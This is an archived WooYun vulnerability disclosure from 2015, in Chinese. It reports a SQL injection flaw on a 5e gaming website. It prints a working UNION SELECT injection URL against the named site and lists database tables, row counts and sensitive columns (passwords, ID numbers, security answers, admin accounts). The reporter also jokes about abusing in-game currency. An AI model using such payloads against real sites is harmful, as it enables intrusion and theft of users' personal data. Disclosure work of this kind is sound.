5e游戏网站SQL注入漏洞导致100W+条用户记录泄漏

发表于 2015年07月24日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0128966

漏洞标题：5e游戏网站SQL注入漏洞导致100W+条用户记录泄漏

漏洞详情

披露状态：

2015-07-24: 积极联系厂商并且等待厂商认领中，细节不对外公开
2015-09-07: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

5e游戏网站SQL注入漏洞导致100W+条用户记录泄漏

详细说明：

http://login.5ebo.com/api.php?op=game_list_api&gid=9&count=3gid参数有问题http://login.5ebo.com/api.php?op=game_list_api&gid=99999.9+union+all+select+1,user(),version(),3,4--+a&count=3

部份敏感的表项信息

uc_members<br>
	count:612774<br>
		uid<br>
		username<br>
		password<br>
		email<br>
		myid<br>
		myidkey<br>
		regip<br>
		regdate<br>
		lastloginip<br>
		lastlogintime<br>
		salt<br>
		secques<br>
		repass<br>
		markv9_admin<br>
	count:9<br>
		userid<br>
		username<br>
		password<br>
		roleid<br>
		encrypt<br>
		lastloginip<br>
		lastlogintime<br>
		email<br>
		realname<br>
		card<br>
		langv9_member<br>
	count:599417<br>
		userid<br>
		phpssouid<br>
		username<br>
		password<br>
		encrypt<br>
		nickname<br>
		regdate<br>
		lastdate<br>
		regip<br>
		lastip<br>
		loginnum<br>
		email<br>
		groupid<br>
		areaid<br>
		amount<br>
		point<br>
		modelid<br>
		message<br>
		islock<br>
		vip<br>
		vipexp<br>
		overduedate<br>
		siteid<br>
		connectid<br>
		from<br>
		mobile<br>
		isbinding<br>
		media<br>
		media_uid<br>
		invite_uid<br>
		is_callback<br>
		idnumber<br>
		adult<br>
		realname<br>
		islogin<br>
		signcount<br>
		signlastdate<br>
		is_salesman<br>
		salesman_point<br>
		salesman_charge<br>
	v9_member_detail<br>
	count:535928<br>
		userid<br>
		username<br>
		birthday<br>
		save_question<br>
		save_answer<br>
		sex<br>
		province<br>
		city<br>
		address<br>
		postcode<br>
		channel<br>
		unit<br>
		source<br>
		save_question_2<br>
		save_answer_2<br>
		save_question_3<br>
		save_answer_3v9_sso_members<br>
	count:230299<br>
		uid<br>
		username<br>
		password<br>
		random<br>
		email<br>
		regip<br>
		regdate<br>
		lastip<br>
		lastdate<br>
		appname<br>
		type<br>
		avatar<br>
		ucuserid

100

101

102

uc_members

count:612774

uid

username

password

email

myid

myidkey

regip

regdate

lastloginip

lastlogintime

salt

secques

repass

markv9_admin

count:9

userid

username

password

roleid

encrypt

lastloginip

lastlogintime

email

realname

card

langv9_member

count:599417

userid

phpssouid

username

password

encrypt

nickname

regdate

lastdate

regip

lastip

loginnum

email

groupid

areaid

amount

point

modelid

message

islock

vip

vipexp

overduedate

siteid

connectid

from

mobile

isbinding

media

media_uid

invite_uid

is_callback

idnumber

adult

realname

islogin

signcount

signlastdate

is_salesman

salesman_point

salesman_charge

v9_member_detail

count:535928

userid

username

birthday

save_question

save_answer

sex

province

city

address

postcode

channel

unit

source

save_question_2

save_answer_2

save_question_3

save_answer_3v9_sso_members

count:230299

uid

username

password

random

email

regip

regdate

lastip

lastdate

appname

type

avatar

ucuserid

管理员账号信息泄漏：

个人用户的注册信息泄露的内容包括账号名，用户真实名称与身份证ID等敏感信息

泄露的信息还有游戏服务器的配置信息

游戏内用户角色的数据

这个子妈妈再也不用怕我玩游戏了，瞬间顶级金币随便刷啊有木有

漏洞证明：

修复方案：

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：20 (WooYun评价)

评价

2010-01-01 00:00 紫霞仙子白帽子 | Rank:885 漏洞数:70)
我靠，我给alex说你
2010-01-01 00:00 渔村安全实验室白帽子 | Rank:289 漏洞数:21)
啥，不懂

原文连接：5e游戏网站SQL注入漏洞导致100W+条用户记录泄漏 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。